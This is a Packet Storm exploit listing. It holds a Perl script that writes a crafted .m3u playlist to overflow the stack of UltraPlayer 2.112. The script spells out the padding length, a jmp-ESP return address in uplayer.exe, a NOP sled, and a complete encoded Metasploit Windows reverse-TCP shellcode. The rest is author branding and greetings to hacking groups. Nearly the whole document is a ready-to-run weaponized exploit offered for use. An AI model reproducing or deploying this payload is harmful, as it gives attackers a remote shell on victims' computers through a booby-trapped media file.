Lucene search
KedAns-DzPACKETSTORM:109039HistoryJan 24, 2012 - 12:00 a.m.
UltraPlayer 2.112 Buffer Overflow
2012-01-2400:00:00
KedAns-Dz
packetstormsecurity.com
21
`#!/usr/bin/perl
sub logo {
print STDERR << "EOF";
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
EOF
}
####
# Title : UltraPlayer v2.112 (.m3u) Stack Buffer Overflow Exploit
# Author : KedAns-Dz
# E-mail : [email protected] ([email protected]) | [email protected] | [email protected]
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com
# Facebook : http://facebook.com/KedAns
# platform : windows ( Local BOF )
# Type : local exploit / Buffer Overflow
#####
##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |
# | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE .. |
# | ------------------------------------------------- < |
###
$junk = "\x41" x 313; # Junk
$ret = "\xeb".pack("V", 0x90471230)."\x90\x90"; # jump ESP / nop - uplayer.exe - /nop /nop
$nops = "\x90" x 48; # n0ps
$acc = "\x41" x 88; # buf
$shell = # win/shell_reverse_tcp | enc=alphaMiX | by : MSF
"\x89\xe2\xd9\xd0\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a" .
"\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59" .
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" .
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" .
"\x75\x4a\x49\x4b\x4c\x4b\x58\x4c\x49\x45\x50\x45\x50\x47" .
"\x70\x43\x50\x4b\x39\x5a\x45\x56\x51\x49\x42\x52\x44\x4c" .
"\x4b\x56\x32\x50\x30\x4e\x6b\x56\x32\x54\x4c\x4e\x6b\x51" .
"\x42\x54\x54\x4e\x6b\x43\x42\x45\x78\x56\x6f\x58\x37\x52" .
"\x6a\x45\x76\x56\x51\x49\x6f\x56\x51\x4b\x70\x4c\x6c\x47" .
"\x4c\x50\x61\x51\x6c\x43\x32\x56\x4c\x47\x50\x4b\x71\x5a" .
"\x6f\x54\x4d\x47\x71\x58\x47\x49\x72\x5a\x50\x50\x52\x43" .
"\x67\x4e\x6b\x51\x42\x54\x50\x4e\x6b\x51\x52\x45\x6c\x45" .
"\x51\x4e\x30\x4e\x6b\x51\x50\x51\x68\x4d\x55\x4b\x70\x50" .
"\x74\x51\x5a\x47\x71\x5a\x70\x52\x70\x4e\x6b\x51\x58\x54" .
"\x58\x4e\x6b\x52\x78\x47\x50\x47\x71\x4e\x33\x5a\x43\x45" .
"\x6c\x47\x39\x4c\x4b\x45\x64\x4e\x6b\x43\x31\x4e\x36\x54" .
"\x71\x49\x6f\x56\x51\x49\x50\x4e\x4c\x5a\x61\x58\x4f\x56" .
"\x6d\x45\x51\x49\x57\x50\x38\x4d\x30\x43\x45\x58\x74\x56" .
"\x63\x43\x4d\x4b\x48\x47\x4b\x51\x6d\x51\x34\x51\x65\x4b" .
"\x52\x56\x38\x4e\x6b\x56\x38\x54\x64\x56\x61\x58\x53\x45" .
"\x36\x4c\x4b\x56\x6c\x52\x6b\x4e\x6b\x52\x78\x45\x4c\x43" .
"\x31\x4b\x63\x4c\x4b\x47\x74\x4c\x4b\x43\x31\x5a\x70\x4d" .
"\x59\x50\x44\x54\x64\x45\x74\x43\x6b\x43\x6b\x51\x71\x52" .
"\x79\x50\x5a\x43\x61\x4b\x4f\x49\x70\x56\x38\x51\x4f\x52" .
"\x7a\x4e\x6b\x47\x62\x58\x6b\x4c\x46\x51\x4d\x51\x78\x56" .
"\x53\x56\x52\x47\x70\x47\x70\x50\x68\x52\x57\x51\x63\x54" .
"\x72\x43\x6f\x50\x54\x52\x48\x50\x4c\x51\x67\x54\x66\x43" .
"\x37\x4b\x4f\x58\x55\x4d\x68\x4c\x50\x45\x51\x45\x50\x43" .
"\x30\x54\x69\x58\x44\x56\x34\x50\x50\x45\x38\x45\x79\x4d" .
"\x50\x52\x4b\x43\x30\x4b\x4f\x4e\x35\x56\x30\x56\x30\x52" .
"\x70\x56\x30\x47\x30\x52\x70\x47\x30\x56\x30\x50\x68\x58" .
"\x6a\x56\x6f\x4b\x6f\x4b\x50\x49\x6f\x4b\x65\x4c\x49\x5a" .
"\x67\x52\x48\x51\x6f\x45\x50\x43\x30\x43\x31\x45\x38\x54" .
"\x42\x45\x50\x47\x61\x43\x6c\x4d\x59\x5a\x46\x52\x4a\x54" .
"\x50\x43\x66\x43\x67\x51\x78\x4f\x69\x49\x35\x52\x54\x50" .
"\x61\x4b\x4f\x49\x45\x50\x68\x50\x63\x50\x6d\x45\x34\x45" .
"\x50\x4c\x49\x49\x73\x52\x77\x52\x77\x50\x57\x50\x31\x5a" .
"\x56\x51\x7a\x45\x42\x52\x79\x43\x66\x4b\x52\x49\x6d\x50" .
"\x66\x49\x57\x50\x44\x47\x54\x45\x6c\x43\x31\x43\x31\x4c" .
"\x4d\x50\x44\x56\x44\x56\x70\x4f\x36\x47\x70\x52\x64\x51" .
"\x44\x50\x50\x50\x56\x52\x76\x43\x66\x50\x46\x51\x46\x50" .
"\x4e\x50\x56\x56\x36\x52\x73\x52\x76\x50\x68\x43\x49\x5a" .
"\x6c\x45\x6f\x4b\x36\x49\x6f\x49\x45\x4e\x69\x4d\x30\x52" .
"\x6e\x56\x36\x47\x36\x4b\x4f\x50\x30\x43\x58\x45\x58\x4b" .
"\x37\x47\x6d\x43\x50\x4b\x4f\x4e\x35\x4d\x6b\x5a\x50\x58" .
"\x35\x49\x32\x50\x56\x43\x58\x4f\x56\x4c\x55\x4d\x6d\x4d" .
"\x4d\x4b\x4f\x4e\x35\x45\x6c\x43\x36\x43\x4c\x54\x4a\x4b" .
"\x30\x49\x6b\x4d\x30\x54\x35\x54\x45\x4f\x4b\x43\x77\x54" .
"\x53\x43\x42\x52\x4f\x51\x7a\x45\x50\x52\x73\x4b\x4f\x58" .
"\x55\x41\x41";
# Make m3u Ev!L Exploit
my $ked = "http://".$junk."/inj3ct0r.x".$ret.$acc."\x90\x90\x90".$shell.$nops.".mp3";
open(F,'>> Inj3ct0r.m3u');
print F $ked;
close(F);
# sP^tHanX & Gr33tZ t0 : Omar (www.l3b-r1z.com) | And My fr!ndS 0n HMD ^___^ <3 <3
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=====================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > || Rizky Ariestiyansyah * Islam Caddy
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * Kalashinkov3 * SeeMe * ZoRLu * anT!-Tr0J4n
# Anjel Injection (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * Sec4ever
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * KinG Of PiraTeS * www.packetstormsecurity.org * TreX
# www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs ..
#=================================================================================================
`